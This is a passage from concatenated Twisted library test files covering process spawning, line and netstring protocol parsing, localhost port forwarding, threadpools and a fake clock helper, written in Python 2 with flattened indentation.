self.fail("got connectionLost(%d) (not 4) during state 2" \
% childFD)
return
self.state = 3
self.transport.closeChildFD(5)
return
def processEnded(self, status):
#print "[%d] processEnded" % self.state
rc = status.value.exitCode
if self.state != 4:
self.fail("processEnded early, rc %d" % rc)
return
if status.value.signal != None:
self.fail("processEnded with signal %s" % status.value.signal)
return
if rc != 0:
self.fail("processEnded with rc %d" % rc)
return
self.deferred.callback(None)
class FDTest(SignalMixin, unittest.TestCase):
def NOTsetUp(self):
from twisted.internet import process
process.Process.debug_child = True
def NOTtearDown(self):
from twisted.internet import process
process.Process.debug_child = False
def testFD(self):
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_fds.py")
d = defer.Deferred()
p = FDChecker(d)
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=None,
path=None,
childFDs={0:"w", 1:"r", 2:2,
3:"w", 4:"r", 5:"w"})
d.addCallback(lambda x : self.failIf(p.failed, p.failed))
return d
def testLinger(self):
# See what happens when all the pipes close before the process
# actually stops. This test *requires* SIGCHLD catching to work,
# as there is no other way to find out the process is done.
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_linger.py")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=None,
path=None,
childFDs={1:"r", 2:2},
)
def processEnded(ign):
self.failUnlessEqual(p.outF.getvalue(),
"here is some text\ngoodbye\n")
return d.addCallback(processEnded)
class Accumulator(protocol.ProcessProtocol):
"""Accumulate data from a process."""
closed = 0
endedDeferred = None
def connectionMade(self):
# print "connection made"
self.outF = StringIO.StringIO()
self.errF = StringIO.StringIO()
def outReceived(self, d):
# print "data", repr(d)
self.outF.write(d)
def errReceived(self, d):
# print "err", repr(d)
self.errF.write(d)
def outConnectionLost(self):
# print "out closed"
pass
def errConnectionLost(self):
# print "err closed"
pass
def processEnded(self, reason):
self.closed = 1
if self.endedDeferred is not None:
d, self.endedDeferred = self.endedDeferred, None
d.callback(None)
class PosixProcessBase:
"""Test running processes."""
usePTY = 0
def testNormalTermination(self):
if os.path.exists('/bin/true'): cmd = '/bin/true'
elif os.path.exists('/usr/bin/true'): cmd = '/usr/bin/true'
else: raise RuntimeError("true not found in /bin or /usr/bin")
d = defer.Deferred()
p = TrivialProcessProtocol(d)
reactor.spawnProcess(p, cmd, ['true'], env=None,
usePTY=self.usePTY)
def check(ignored):
p.reason.trap(error.ProcessDone)
self.assertEquals(p.reason.value.exitCode, 0)
self.assertEquals(p.reason.value.signal, None)
d.addCallback(check)
return d
def testAbnormalTermination(self):
if os.path.exists('/bin/false'): cmd = '/bin/false'
elif os.path.exists('/usr/bin/false'): cmd = '/usr/bin/false'
else: raise RuntimeError("false not found in /bin or /usr/bin")
d = defer.Deferred()
p = TrivialProcessProtocol(d)
reactor.spawnProcess(p, cmd, ['false'], env=None,
usePTY=self.usePTY)
def check(ignored):
p.reason.trap(error.ProcessTerminated)
self.assertEquals(p.reason.value.exitCode, 1)
self.assertEquals(p.reason.value.signal, None)
d.addCallback(check)
return d
def _testSignal(self, sig):
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_signal.py")
d = defer.Deferred()
p = SignalProtocol(d, sig)
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath, sig],
env=None,
usePTY=self.usePTY)
return d
def testSignalHUP(self):
d = self._testSignal('HUP')
d.addCallback(self.failIf)
return d
def testSignalINT(self):
d = self._testSignal('INT')
d.addCallback(self.failIf)
return d
def testSignalKILL(self):
d = self._testSignal('KILL')
d.addCallback(self.failIf)
return d
class PosixProcessTestCase(SignalMixin, unittest.TestCase, PosixProcessBase):
# add three non-pty test cases
def testStderr(self):
# we assume there is no file named ZZXXX..., both in . and in /tmp
if not os.path.exists('/bin/ls'):
raise RuntimeError("/bin/ls not found")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, '/bin/ls',
["/bin/ls",
"ZZXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"],
env=None, path="/tmp",
usePTY=self.usePTY)
def processEnded(ign):
self.assertEquals(lsOut, p.errF.getvalue())
return d.addCallback(processEnded)
def testProcess(self):
if os.path.exists('/bin/gzip'): cmd = '/bin/gzip'
elif os.path.exists('/usr/bin/gzip'): cmd = '/usr/bin/gzip'
else: raise RuntimeError("gzip not found in /bin or /usr/bin")
s = "there's no place like home!\n" * 3
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, cmd, [cmd, "-c"], env=None, path="/tmp",
usePTY=self.usePTY)
p.transport.write(s)
p.transport.closeStdin()
def processEnded(ign):
f = p.outF
f.seek(0, 0)
gf = gzip.GzipFile(fileobj=f)
self.assertEquals(gf.read(), s)
return d.addCallback(processEnded)
class PosixProcessTestCasePTY(SignalMixin, unittest.TestCase, PosixProcessBase):
"""Just like PosixProcessTestCase, but use ptys instead of pipes."""
usePTY = 1
# PTYs only offer one input and one output. What still makes sense?
# testNormalTermination
# testAbnormalTermination
# testSignal
# testProcess, but not without p.transport.closeStdin
# might be solveable: TODO: add test if so
def testOpeningTTY(self):
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_tty.py")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=None,
path=None, usePTY=self.usePTY)
p.transport.write("hello world!\n")
def processEnded(ign):
self.assertEquals(
p.outF.getvalue(),
"hello world!\r\nhello world!\r\n",
"Error message from process_tty follows:\n\n%s\n\n" % p.outF.getvalue())
return d.addCallback(processEnded)
def testBadArgs(self):
pyExe = sys.executable
pyArgs = [pyExe, "-u", "-c", "print 'hello'"]
p = Accumulator()
self.assertRaises(ValueError, reactor.spawnProcess, p, pyExe, pyArgs, usePTY=1, childFDs={1:'r'})
class Win32ProcessTestCase(SignalMixin, unittest.TestCase):
"""Test process programs that are packaged with twisted."""
def testStdinReader(self):
pyExe = sys.executable
scriptPath = util.sibpath(__file__, "process_stdinreader.py")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, pyExe, [pyExe, "-u", scriptPath], env=None,
path=None)
p.transport.write("hello, world")
p.transport.closeStdin()
def processEnded(ign):
self.assertEquals(p.errF.getvalue(), "err\nerr\n")
self.assertEquals(p.outF.getvalue(), "out\nhello, world\nout\n")
return d.addCallback(processEnded)
def testBadArgs(self):
pyExe = sys.executable
pyArgs = [pyExe, "-u", "-c", "print 'hello'"]
p = Accumulator()
self.assertRaises(ValueError, reactor.spawnProcess, p, pyExe, pyArgs, uid=1)
self.assertRaises(ValueError, reactor.spawnProcess, p, pyExe, pyArgs, gid=1)
self.assertRaises(ValueError, reactor.spawnProcess, p, pyExe, pyArgs, usePTY=1)
self.assertRaises(ValueError, reactor.spawnProcess, p, pyExe, pyArgs, childFDs={1:'r'})
class UtilTestCase(unittest.TestCase):
"""
Tests for process-related helper functions (currently only
    L{procutils.which}).
"""
def setUp(self):
"""
Create several directories and files, some of which are executable
and some of which are not. Save the current PATH setting.
"""
j = os.path.join
base = self.mktemp()
self.foo = j(base, "foo")
self.baz = j(base, "baz")
self.foobar = j(self.foo, "bar")
self.foobaz = j(self.foo, "baz")
self.bazfoo = j(self.baz, "foo")
self.bazbar = j(self.baz, "bar")
for d in self.foobar, self.foobaz, self.bazfoo, self.bazbar:
os.makedirs(d)
for name, mode in [(j(self.foobaz, "executable"), 0700),
(j(self.foo, "executable"), 0700),
(j(self.bazfoo, "executable"), 0700),
(j(self.bazfoo, "executable.bin"), 0700),
(j(self.bazbar, "executable"), 0)]:
f = file(name, "w")
f.close()
os.chmod(name, mode)
self.oldPath = os.environ.get('PATH', None)
os.environ['PATH'] = os.pathsep.join((
self.foobar, self.foobaz, self.bazfoo, self.bazbar))
def tearDown(self):
"""
Restore the saved PATH setting.
"""
if self.oldPath is None:
try:
del os.environ['PATH']
except KeyError:
pass
else:
os.environ['PATH'] = self.oldPath
def test_whichWithoutPATH(self):
"""
Test that if C{os.environ} does not have a C{'PATH'} key,
L{procutils.which} returns an empty list.
"""
del os.environ['PATH']
self.assertEqual(procutils.which("executable"), [])
def testWhich(self):
j = os.path.join
paths = procutils.which("executable")
expectedPaths = [j(self.foobaz, "executable"),
j(self.bazfoo, "executable")]
if runtime.platform.isWindows():
expectedPaths.append(j(self.bazbar, "executable"))
self.assertEquals(paths, expectedPaths)
def testWhichPathExt(self):
j = os.path.join
old = os.environ.get('PATHEXT', None)
os.environ['PATHEXT'] = os.pathsep.join(('.bin', '.exe', '.sh'))
try:
paths = procutils.which("executable")
finally:
if old is None:
del os.environ['PATHEXT']
else:
os.environ['PATHEXT'] = old
expectedPaths = [j(self.foobaz, "executable"),
j(self.bazfoo, "executable"),
j(self.bazfoo, "executable.bin")]
if runtime.platform.isWindows():
expectedPaths.append(j(self.bazbar, "executable"))
self.assertEquals(paths, expectedPaths)
class ClosingPipesProcessProtocol(protocol.ProcessProtocol):
output = ''
errput = ''
def __init__(self, outOrErr):
self.deferred = defer.Deferred()
self.outOrErr = outOrErr
def processEnded(self, reason):
self.deferred.callback(reason)
def outReceived(self, data):
self.output += data
def errReceived(self, data):
self.errput += data
class ClosingPipes(unittest.TestCase):
def doit(self, fd):
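        # Start a child that blocks on raw_input(), close the pipe it is about
        # to write to, then let it run: the write should fail with EPIPE, so
        # the child never reaches sys.exit(42) (checked in _endProcess).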
p = ClosingPipesProcessProtocol(True)
p.deferred.addCallbacks(
callback=lambda _: self.fail("I wanted an errback."),
errback=self._endProcess, errbackArgs=(p,))
reactor.spawnProcess(p, sys.executable,
[sys.executable, '-u', '-c',
r'raw_input(); import sys, os; os.write(%d, "foo\n"); sys.exit(42)' % fd],
env=None)
p.transport.write('go\n')
if fd == 1:
p.transport.closeStdout()
elif fd == 2:
p.transport.closeStderr()
else:
raise RuntimeError
# make the buggy case not hang
p.transport.closeStdin()
return p.deferred
def _endProcess(self, reason, p):
self.failIf(reason.check(error.ProcessDone),
'Child should fail due to EPIPE.')
reason.trap(error.ProcessTerminated)
# child must not get past that write without raising
self.failIfEqual(reason.value.exitCode, 42,
'process reason was %r' % reason)
self.failUnlessEqual(p.output, '')
return p.errput
def test_stdout(self):
"""ProcessProtocol.transport.closeStdout actually closes the pipe."""
d = self.doit(1)
def _check(errput):
self.failIfEqual(errput.find('OSError'), -1)
if runtime.platform.getType() != 'win32':
self.failIfEqual(errput.find('Broken pipe'), -1)
d.addCallback(_check)
return d
def test_stderr(self):
"""ProcessProtocol.transport.closeStderr actually closes the pipe."""
d = self.doit(2)
def _check(errput):
# there should be no stderr open, so nothing for it to
# write the error to.
self.failUnlessEqual(errput, '')
d.addCallback(_check)
return d
skipMessage = "wrong platform or reactor doesn't support IReactorProcess"
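# Skip the platform-specific test cases when the current platform or the
# reactor's process support cannot run them.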
if (runtime.platform.getType() != 'posix') or (not interfaces.IReactorProcess(reactor, None)):
PosixProcessTestCase.skip = skipMessage
PosixProcessTestCasePTY.skip = skipMessage
TestTwoProcessesPosix.skip = skipMessage
FDTest.skip = skipMessage
else:
# do this before running the tests: it uses SIGCHLD and stuff internally
lsOut = popen2.popen3("/bin/ls ZZXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX")[2].read()
if (runtime.platform.getType() != 'win32') or (not interfaces.IReactorProcess(reactor, None)):
Win32ProcessTestCase.skip = skipMessage
TestTwoProcessesNonPosix.skip = skipMessage
if not interfaces.IReactorProcess(reactor, None):
ProcessTestCase.skip = skipMessage
ClosingPipes.skip = skipMessage
```
#### File: twisted/test/test_protocols.py
```python
from twisted.trial import unittest
from twisted.protocols import basic, wire, portforward
from twisted.internet import reactor, protocol, defer, task, error
import struct
import StringIO
class StringIOWithoutClosing(StringIO.StringIO):
"""
A StringIO that can't be closed.
"""
def close(self):
"""
Do nothing.
"""
class LineTester(basic.LineReceiver):
"""
    A line receiver that parses received data and acts on certain tokens.
@type delimiter: C{str}
@ivar delimiter: character used between received lines.
@type MAX_LENGTH: C{int}
@ivar MAX_LENGTH: size of a line when C{lineLengthExceeded} will be called.
@type clock: L{twisted.internet.task.Clock}
    @ivar clock: clock simulating reactor callLater. Pass it to the
        constructor if you want to use the pause/rawpause functionality.
"""
delimiter = '\n'
MAX_LENGTH = 64
def __init__(self, clock=None):
"""
If given, use a clock to make callLater calls.
"""
self.clock = clock
def connectionMade(self):
"""
Create/clean data received on connection.
"""
self.received = []
def lineReceived(self, line):
"""
        Receive a line and perform an action for certain tokens: pause,
        rawpause, stop, len, produce, unproduce.
"""
self.received.append(line)
if line == '':
self.setRawMode()
elif line == 'pause':
self.pauseProducing()
self.clock.callLater(0, self.resumeProducing)
elif line == 'rawpause':
self.pauseProducing()
self.setRawMode()
self.received.append('')
self.clock.callLater(0, self.resumeProducing)
elif line == 'stop':
self.stopProducing()
elif line[:4] == 'len ':
self.length = int(line[4:])
elif line.startswith('produce'):
self.transport.registerProducer(self, False)
elif line.startswith('unproduce'):
self.transport.unregisterProducer()
def rawDataReceived(self, data):
"""
Read raw data, until the quantity specified by a previous 'len' line is
reached.
"""
data, rest = data[:self.length], data[self.length:]
self.length = self.length - len(data)
self.received[-1] = self.received[-1] + data
if self.length == 0:
self.setLineMode(rest)
def lineLengthExceeded(self, line):
"""
        Adjust line mode when long lines are received.
"""
if len(line) > self.MAX_LENGTH + 1:
self.setLineMode(line[self.MAX_LENGTH + 1:])
class LineOnlyTester(basic.LineOnlyReceiver):
"""
    A buffering line-only receiver.
"""
delimiter = '\n'
MAX_LENGTH = 64
def connectionMade(self):
"""
Create/clean data received on connection.
"""
self.received = []
def lineReceived(self, line):
"""
Save received data.
"""
self.received.append(line)
class WireTestCase(unittest.TestCase):
"""
Test wire protocols.
"""
def testEcho(self):
"""
        Test the wire.Echo protocol: send some data and check that it is sent
        back.
"""
t = StringIOWithoutClosing()
a = wire.Echo()
a.makeConnection(protocol.FileWrapper(t))
a.dataReceived("hello")
a.dataReceived("world")
a.dataReceived("how")
a.dataReceived("are")
a.dataReceived("you")
self.failUnlessEqual(t.getvalue(), "helloworldhowareyou")
def testWho(self):
"""
Test wire.Who protocol.
"""
t = StringIOWithoutClosing()
a = wire.Who()
a.makeConnection(protocol.FileWrapper(t))
self.failUnlessEqual(t.getvalue(), "root\r\n")
def testQOTD(self):
"""
Test wire.QOTD protocol.
"""
t = StringIOWithoutClosing()
a = wire.QOTD()
a.makeConnection(protocol.FileWrapper(t))
self.failUnlessEqual(t.getvalue(),
"An apple a day keeps the doctor away.\r\n")
def testDiscard(self):
"""
Test wire.Discard protocol.
"""
t = StringIOWithoutClosing()
a = wire.Discard()
a.makeConnection(protocol.FileWrapper(t))
a.dataReceived("hello")
a.dataReceived("world")
a.dataReceived("how")
a.dataReceived("are")
a.dataReceived("you")
self.failUnlessEqual(t.getvalue(), "")
class LineReceiverTestCase(unittest.TestCase):
"""
Test LineReceiver, using the C{LineTester} wrapper.
"""
buffer = '''\
len 10
0123456789len 5
1234
len 20
foo 123
0123456789
012345678len 0
foo 5
1234567890123456789012345678901234567890123456789012345678901234567890
len 1
a'''
output = ['len 10', '0123456789', 'len 5', '1234\n',
'len 20', 'foo 123', '0123456789\n012345678',
'len 0', 'foo 5', '', '67890', 'len 1', 'a']
def testBuffer(self):
"""
        Test buffering for different packet sizes, checking that the received
        data matches the expected output.
"""
for packet_size in range(1, 10):
t = StringIOWithoutClosing()
a = LineTester()
a.makeConnection(protocol.FileWrapper(t))
for i in range(len(self.buffer)/packet_size + 1):
s = self.buffer[i*packet_size:(i+1)*packet_size]
a.dataReceived(s)
self.failUnlessEqual(self.output, a.received)
pause_buf = 'twiddle1\ntwiddle2\npause\ntwiddle3\n'
pause_output1 = ['twiddle1', 'twiddle2', 'pause']
pause_output2 = pause_output1+['twiddle3']
def testPausing(self):
"""
        Test pausing inside data receiving. It uses a fake clock to check
        that pausing/resuming works.
"""
for packet_size in range(1, 10):
t = StringIOWithoutClosing()
clock = task.Clock()
a = LineTester(clock)
a.makeConnection(protocol.FileWrapper(t))
for i in range(len(self.pause_buf)/packet_size + 1):
s = self.pause_buf[i*packet_size:(i+1)*packet_size]
a.dataReceived(s)
self.failUnlessEqual(self.pause_output1, a.received)
clock.advance(0)
self.failUnlessEqual(self.pause_output2, a.received)
rawpause_buf = 'twiddle1\ntwiddle2\nlen 5\nrawpause\n12345twiddle3\n'
rawpause_output1 = ['twiddle1', 'twiddle2', 'len 5', 'rawpause', '']
rawpause_output2 = ['twiddle1', 'twiddle2', 'len 5', 'rawpause', '12345',
'twiddle3']
def testRawPausing(self):
"""
        Test pausing inside raw data receiving.
"""
for packet_size in range(1, 10):
t = StringIOWithoutClosing()
clock = task.Clock()
a = LineTester(clock)
a.makeConnection(protocol.FileWrapper(t))
for i in range(len(self.rawpause_buf)/packet_size + 1):
s = self.rawpause_buf[i*packet_size:(i+1)*packet_size]
a.dataReceived(s)
self.failUnlessEqual(self.rawpause_output1, a.received)
clock.advance(0)
self.failUnlessEqual(self.rawpause_output2, a.received)
stop_buf = 'twiddle1\ntwiddle2\nstop\nmore\nstuff\n'
stop_output = ['twiddle1', 'twiddle2', 'stop']
def testStopProducing(self):
"""
        Test calling stopProducing while receiving data.
"""
for packet_size in range(1, 10):
t = StringIOWithoutClosing()
a = LineTester()
a.makeConnection(protocol.FileWrapper(t))
for i in range(len(self.stop_buf)/packet_size + 1):
s = self.stop_buf[i*packet_size:(i+1)*packet_size]
a.dataReceived(s)
self.failUnlessEqual(self.stop_output, a.received)
def testLineReceiverAsProducer(self):
"""
        Test producer registration and unregistration while receiving.
"""
a = LineTester()
t = StringIOWithoutClosing()
a.makeConnection(protocol.FileWrapper(t))
a.dataReceived('produce\nhello world\nunproduce\ngoodbye\n')
self.assertEquals(a.received,
['produce', 'hello world', 'unproduce', 'goodbye'])
class LineOnlyReceiverTestCase(unittest.TestCase):
"""
    Test the line-only receiver.
"""
buffer = """foo
bleakness
desolation
plastic forks
"""
def testBuffer(self):
"""
Test buffering over line protocol: data received should match buffer.
"""
t = StringIOWithoutClosing()
a = LineOnlyTester()
a.makeConnection(protocol.FileWrapper(t))
for c in self.buffer:
a.dataReceived(c)
self.failUnlessEqual(a.received, self.buffer.split('\n')[:-1])
def testLineTooLong(self):
"""
Test sending a line too long: it should close the connection.
"""
t = StringIOWithoutClosing()
a = LineOnlyTester()
a.makeConnection(protocol.FileWrapper(t))
res = a.dataReceived('x'*200)
self.assertTrue(isinstance(res, error.ConnectionLost))
class TestMixin:
def connectionMade(self):
self.received = []
def stringReceived(self, s):
self.received.append(s)
MAX_LENGTH = 50
closed = 0
def connectionLost(self, reason):
self.closed = 1
class TestNetstring(TestMixin, basic.NetstringReceiver):
pass
class LPTestCaseMixin:
illegal_strings = []
protocol = None
def getProtocol(self):
t = StringIOWithoutClosing()
a = self.protocol()
a.makeConnection(protocol.FileWrapper(t))
return a
def testIllegal(self):
for s in self.illegal_strings:
r = self.getProtocol()
for c in s:
r.dataReceived(c)
self.assertEquals(r.transport.closed, 1)
class NetstringReceiverTestCase(unittest.TestCase, LPTestCaseMixin):
strings = ['hello', 'world', 'how', 'are', 'you123', ':today', "a"*515]
illegal_strings = [
'9999999999999999999999', 'abc', '4:abcde',
'51:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab,',]
protocol = TestNetstring
def testBuffer(self):
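        # Round-trip: serialize the strings with sendString(), then feed the
        # raw bytes back in packet_size pieces and check that every string is
        # received intact.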
for packet_size in range(1, 10):
t = StringIOWithoutClosing()
a = TestNetstring()
a.MAX_LENGTH = 699
a.makeConnection(protocol.FileWrapper(t))
for s in self.strings:
a.sendString(s)
out = t.getvalue()
for i in range(len(out)/packet_size + 1):
s = out[i*packet_size:(i+1)*packet_size]
if s:
a.dataReceived(s)
self.assertEquals(a.received, self.strings)
class TestInt32(TestMixin, basic.Int32StringReceiver):
MAX_LENGTH = 50
class Int32TestCase(unittest.TestCase, LPTestCaseMixin):
protocol = TestInt32
strings = ["a", "b" * 16]
illegal_strings = ["\x10\x00\x00\x00aaaaaa"]
partial_strings = ["\x00\x00\x00", "hello there", ""]
def testPartial(self):
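        # Incomplete length-prefixed strings must not deliver anything to
        # stringReceived.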
for s in self.partial_strings:
r = self.getProtocol()
r.MAX_LENGTH = 99999999
for c in s:
r.dataReceived(c)
self.assertEquals(r.received, [])
def testReceive(self):
r = self.getProtocol()
for s in self.strings:
for c in struct.pack("!i",len(s))+s:
r.dataReceived(c)
self.assertEquals(r.received, self.strings)
class OnlyProducerTransport(object):
# Transport which isn't really a transport, just looks like one to
# someone not looking very hard.
paused = False
disconnecting = False
def __init__(self):
self.data = []
def pauseProducing(self):
self.paused = True
def resumeProducing(self):
self.paused = False
def write(self, bytes):
self.data.append(bytes)
class ConsumingProtocol(basic.LineReceiver):
# Protocol that really, really doesn't want any more bytes.
def lineReceived(self, line):
self.transport.write(line)
self.pauseProducing()
class ProducerTestCase(unittest.TestCase):
def testPauseResume(self):
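        # ConsumingProtocol pauses itself after every complete line, so the
        # transport should be paused after each line is written, and each
        # resumeProducing() releases at most one buffered line before pausing
        # again.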
p = ConsumingProtocol()
t = OnlyProducerTransport()
p.makeConnection(t)
p.dataReceived('hello, ')
self.failIf(t.data)
self.failIf(t.paused)
self.failIf(p.paused)
p.dataReceived('world\r\n')
self.assertEquals(t.data, ['hello, world'])
self.failUnless(t.paused)
self.failUnless(p.paused)
p.resumeProducing()
self.failIf(t.paused)
self.failIf(p.paused)
p.dataReceived('hello\r\nworld\r\n')
self.assertEquals(t.data, ['hello, world', 'hello'])
self.failUnless(t.paused)
self.failUnless(p.paused)
p.resumeProducing()
p.dataReceived('goodbye\r\n')
self.assertEquals(t.data, ['hello, world', 'hello', 'world'])
self.failUnless(t.paused)
self.failUnless(p.paused)
p.resumeProducing()
self.assertEquals(t.data, ['hello, world', 'hello', 'world', 'goodbye'])
self.failUnless(t.paused)
self.failUnless(p.paused)
p.resumeProducing()
self.assertEquals(t.data, ['hello, world', 'hello', 'world', 'goodbye'])
self.failIf(t.paused)
self.failIf(p.paused)
class Portforwarding(unittest.TestCase):
"""
Test port forwarding.
"""
def setUp(self):
self.serverProtocol = wire.Echo()
self.clientProtocol = protocol.Protocol()
self.openPorts = []
def tearDown(self):
try:
self.clientProtocol.transport.loseConnection()
except:
pass
try:
self.serverProtocol.transport.loseConnection()
except:
pass
return defer.gatherResults(
[defer.maybeDeferred(p.stopListening) for p in self.openPorts])
def testPortforward(self):
"""
Test port forwarding through Echo protocol.
"""
realServerFactory = protocol.ServerFactory()
realServerFactory.protocol = lambda: self.serverProtocol
realServerPort = reactor.listenTCP(0, realServerFactory,
interface='127.0.0.1')
self.openPorts.append(realServerPort)
proxyServerFactory = portforward.ProxyFactory('127.0.0.1',
realServerPort.getHost().port)
proxyServerPort = reactor.listenTCP(0, proxyServerFactory,
interface='127.0.0.1')
self.openPorts.append(proxyServerPort)
nBytes = 1000
received = []
d = defer.Deferred()
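        # Data path: client -> proxy -> real echo server -> proxy -> client.
        # Once all nBytes bytes have come back, the deferred fires and ends
        # the test.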
def testDataReceived(data):
received.extend(data)
if len(received) >= nBytes:
self.assertEquals(''.join(received), 'x' * nBytes)
d.callback(None)
self.clientProtocol.dataReceived = testDataReceived
def testConnectionMade():
self.clientProtocol.transport.write('x' * nBytes)
self.clientProtocol.connectionMade = testConnectionMade
clientFactory = protocol.ClientFactory()
clientFactory.protocol = lambda: self.clientProtocol
reactor.connectTCP(
'127.0.0.1', proxyServerPort.getHost().port, clientFactory)
return d
```
#### File: twisted/test/test_shortcut.py
```python
from twisted.trial import unittest
import os
if os.name == 'nt':
from twisted.python import shortcut
import os.path
import sys
class ShortcutTest(unittest.TestCase):
def testCreate(self):
s1=shortcut.Shortcut("test_shortcut.py")
tempname=self.mktemp() + '.lnk'
s1.save(tempname)
self.assert_(os.path.exists(tempname))
sc=shortcut.open(tempname)
self.assert_(sc.GetPath(0)[0].endswith('test_shortcut.py'))
```
#### File: twisted/test/test_threadpool.py
```python
import pickle, time
from twisted.trial import unittest
from twisted.python import log, threadable
from twisted.internet import reactor, interfaces
#
# See the end of this module for the remainder of the imports.
#
class Synchronization(object):
failures = 0
def __init__(self, N, waiting):
self.N = N
self.waiting = waiting
self.lock = threading.Lock()
self.runs = []
def run(self):
# This is the testy part: this is supposed to be invoked
# serially from multiple threads. If that is actually the
# case, we will never fail to acquire this lock. If it is
# *not* the case, we might get here while someone else is
# holding the lock.
if self.lock.acquire(False):
if not len(self.runs) % 5:
time.sleep(0.0002) # Constant selected based on
# empirical data to maximize the
# chance of a quick failure if this
# code is broken.
self.lock.release()
else:
self.failures += 1
# This is just the only way I can think of to wake up the test
# method. It doesn't actually have anything to do with the
# test.
self.lock.acquire()
self.runs.append(None)
if len(self.runs) == self.N:
self.waiting.release()
self.lock.release()
synchronized = ["run"]
threadable.synchronize(Synchronization)
class ThreadPoolTestCase(unittest.TestCase):
"""Test threadpools."""
def testPersistence(self):
tp = threadpool.ThreadPool(7, 20)
tp.start()
# XXX Sigh - race condition: start should return a Deferred
# which fires when all the workers it started have fully
# started up.
time.sleep(0.1)
self.assertEquals(len(tp.threads), 7)
self.assertEquals(tp.min, 7)
self.assertEquals(tp.max, 20)
# check that unpickled threadpool has same number of threads
s = pickle.dumps(tp)
tp2 = pickle.loads(s)
tp2.start()
# XXX As above
time.sleep(0.1)
self.assertEquals(len(tp2.threads), 7)
self.assertEquals(tp2.min, 7)
self.assertEquals(tp2.max, 20)
tp.stop()
tp2.stop()
def _waitForLock(self, lock):
for i in xrange(1000000):
if lock.acquire(False):
break
time.sleep(1e-5)
else:
self.fail("A long time passed without succeeding")
def _threadpoolTest(self, method):
# This is a schizophrenic test: it seems to be trying to test
# both the dispatch() behavior of the ThreadPool as well as
# the serialization behavior of threadable.synchronize(). It
# would probably make more sense as two much simpler tests.
N = 10
tp = threadpool.ThreadPool()
tp.start()
try:
waiting = threading.Lock()
waiting.acquire()
actor = Synchronization(N, waiting)
for i in xrange(N):
tp.dispatch(actor, actor.run)
self._waitForLock(waiting)
self.failIf(actor.failures, "run() re-entered %d times" % (actor.failures,))
finally:
tp.stop()
def testDispatch(self):
return self._threadpoolTest(lambda tp, actor: tp.dispatch(actor, actor.run))
def testCallInThread(self):
return self._threadpoolTest(lambda tp, actor: tp.callInThread(actor.run))
def testExistingWork(self):
waiter = threading.Lock()
waiter.acquire()
tp = threadpool.ThreadPool(0, 1)
tp.callInThread(waiter.release) # before start()
tp.start()
try:
self._waitForLock(waiter)
finally:
tp.stop()
class RaceConditionTestCase(unittest.TestCase):
def setUp(self):
self.event = threading.Event()
self.threadpool = threadpool.ThreadPool(0, 10)
self.threadpool.start()
def tearDown(self):
del self.event
self.threadpool.stop()
del self.threadpool
def testRace(self):
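        # Queue several waiters and a setter on the pool; if the setter never
        # runs, the wait below times out after two seconds and the test fails.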
self.threadpool.callInThread(self.event.set)
self.event.wait()
self.event.clear()
for i in range(3):
self.threadpool.callInThread(self.event.wait)
self.threadpool.callInThread(self.event.set)
self.event.wait(timeout=2)
if not self.event.isSet():
self.event.set()
raise RuntimeError, "test failed"
def testSingleThread(self):
# Ensure no threads running
self.assertEquals(self.threadpool.workers, 0)
for i in range(10):
self.threadpool.callInThread(self.event.set)
self.event.wait()
self.event.clear()
# Ensure there are very few threads running
self.failUnless(self.threadpool.workers <= 2)
if interfaces.IReactorThreads(reactor, None) is None:
for cls in ThreadPoolTestCase, RaceConditionTestCase:
setattr(cls, 'skip', "No thread support, nothing to test here")
else:
import threading
from twisted.python import threadpool
```
#### File: twisted/test/time_helpers.py
```python
class Clock(object):
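    # A callable stand-in for the reactor's idea of time: calling the instance
    # returns rightNow, which tests advance by hand via adjust()/pump().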
rightNow = 0.0
def __call__(self):
return self.rightNow
def install(self):
# Violation is fun.
from twisted.internet import base, task
from twisted.python import runtime
self.base_original = base.seconds
self.task_original = task.seconds
self.runtime_original = runtime.seconds
base.seconds = self
task.seconds = self
runtime.seconds = self
def uninstall(self):
from twisted.internet import base, task
from twisted.python import runtime
base.seconds = self.base_original
runtime.seconds = self.runtime_original
task.seconds = self.task_original
def adjust(self, amount):
self.rightNow += amount
def pump(self, reactor, timings):
timings = list(timings)
timings.reverse()
self.adjust(timings.pop())
while timings:
self.adjust(timings.pop())
reactor.iterate()
reactor.iterate()
```
#### File: twisted/trial/itrial.py
```python
import zope.interface as zi
class ITestCase(zi.Interface):
"""DEPRECATED in Twisted 2.5. This interface will be removed in the next
release. Implementing it has no impact.
"""
def setUp():
"""I am run before each method is run"""
def tearDown():
"""I am run after each method is run"""
class IReporter(zi.Interface):
"""I report results from a run of a test suite.
In all lists below, 'Results' are either a twisted.python.failure.Failure
object, or a string.
"""
stream = zi.Attribute("@ivar stream: the io-stream that this reporter will write to")
tbformat = zi.Attribute("@ivar tbformat: either 'default', 'brief', or 'verbose'")
args = zi.Attribute("@ivar args: additional string argument passed from the command line")
shouldStop = zi.Attribute("@ivar shouldStop: a boolean indicating that"
" this reporter would like the test run to stop.")
def startTest(method):
"""report the beginning of a run of a single test method
@param method: an object that is adaptable to ITestMethod
"""
def stopTest(method):
"""report the status of a single test method
@param method: an object that is adaptable to ITestMethod
"""
def startSuite(name):
"""suites which wish to appear in reporter output should call this
before running their tests"""
def endSuite(name):
"""called at the end of a suite, if and only if that suite has called
'startSuite'
"""
def cleanupErrors(errs):
"""called when the reactor has been left in a 'dirty' state
@param errs: a list of L{twisted.python.failure.Failure}s
"""
def upDownError(userMeth, warn=True, printStatus=True):
"""called when an error occurs in a setUp* or tearDown* method
@param warn: indicates whether or not the reporter should emit a
warning about the error
@type warn: Boolean
@param printStatus: indicates whether or not the reporter should
print the name of the method and the status
